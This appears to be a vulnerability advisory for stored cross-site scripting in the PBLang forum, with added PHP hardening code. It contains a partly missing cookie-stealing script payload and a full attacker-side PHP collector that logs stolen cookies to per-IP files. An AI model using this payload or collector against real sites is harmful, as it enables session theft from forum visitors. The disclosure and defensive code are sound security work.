PBLang Forum XSS Vulnerability

PBLang is a web forum written in PHP. A security vulnerability in the product allows HTML code and JavaScript to be posted into existing web pages, where it is executed on the client end (a Cross-Site Scripting vulnerability).


Vulnerable systems: PBLang forum

Version:   4.0 or lower


Problem: Cross Site Scripting (XSS)


If someone inserts <script>`anyscript`</script> in place of the post's content, the JavaScript code is executed by Internet Explorer or some other web browsers. This allows stealing of cookie data and other interesting things…
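
The fix for this class of bug is output encoding, shown here as an added example that is not code from PBLang or from the advisory. The function names and the sample post are hypothetical, and it assumes the forum echoes stored post text into HTML, uses PHP sessions over HTTPS, and runs on PHP 7.3 or later.

```php
<?php
// Added example; function names are hypothetical, not PBLang's own code.

// Vulnerable pattern: the stored post body goes into the page verbatim,
// so a <script> element in it runs in every reader's browser.
function render_post_unsafe(string $body): string
{
    return '<div class="post">' . nl2br($body) . '</div>';
}

// Hardened pattern: encode at output time so markup is displayed as text.
// The charset argument must match the encoding the page declares.
function render_post_safe(string $body): string
{
    $text = htmlspecialchars($body, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<div class="post">' . nl2br($text) . '</div>';
}

// Encoding does not neutralise javascript: URLs, so user-supplied links
// get a scheme allowlist that fails closed (relative URLs are rejected too).
function safe_href(string $url): string
{
    $url = trim($url);
    $scheme = strtolower((string) parse_url($url, PHP_URL_SCHEME));
    if (!in_array($scheme, ['http', 'https'], true)) {
        return '#';
    }
    return htmlspecialchars($url, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Defence in depth, assuming PHP sessions: HttpOnly hides the session
// cookie from document.cookie. Call before session_start() and any output.
function harden_session_cookie(): bool
{
    return session_set_cookie_params(
        ['httponly' => true, 'secure' => true, 'samesite' => 'Lax']
    );
}

harden_session_cookie();
$post = "Hello\n<script>anyscript</script>";   // constructed sample post
echo render_post_unsafe($post), "\n";           // script element survives
echo render_post_safe($post), "\n";             // shown as inert text
echo safe_href("javascript:alert('Hi!!!')"), "\n";
echo safe_href('https://example.org/?a=1&b=2'), "\n";
```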


Inserting a new topic (or reply) with the following script sends the visitor's cookies to your host. The output is saved to http://your-





(document.cookie), "subwindows", "height=100,width=486")</script>



Or insert any other script, JavaScript or HTML (e.g. javascript:history.go(-1), window.write('Hello world'), javascript:alert('Hi!!!')…)

*Code of docs.php:*




//Copyright by W_Hat (

define ("LINE", "\r\n");
define ("HTML_LINE", "<br>");

// Formats an array of request variables as "[key]" / value lines,
// echoing them to the page and returning the same text for the log file.
function getvars($arr, $title)
{
    $res = "";
    $len = count($arr);
    if ($len>0)
    {
        if (strlen($title)>0)
        {
            print("[--------$title--------]" . HTML_LINE);
            $res .= "[--------$title--------]" . LINE;
        }
        foreach ($arr as $key => $value)
        {
            print("[$key]" . HTML_LINE);
            print($arr[$key] . HTML_LINE);
            $res .= "[$key]" . LINE . $arr[$key] . LINE;
        }
    }
    return $res;
}

// get current date
$now = date("Y-m-d H:i:s");

// init
$myData = "[-----$now-----]" . LINE;

// get
$myData .= getvars($HTTP_GET_VARS, "");

// file: one log per requesting address, appended to if it already exists
$file = $REMOTE_ADDR . "cookie.txt";
$mode = "r+";
if (!file_exists($file))
    $mode = "w+";
$fp = fopen ($file, $mode);
fseek($fp, 0, SEEK_END);
fwrite($fp, $myData);





Name: Quan Van Truong


Occupation: Bug Hunter

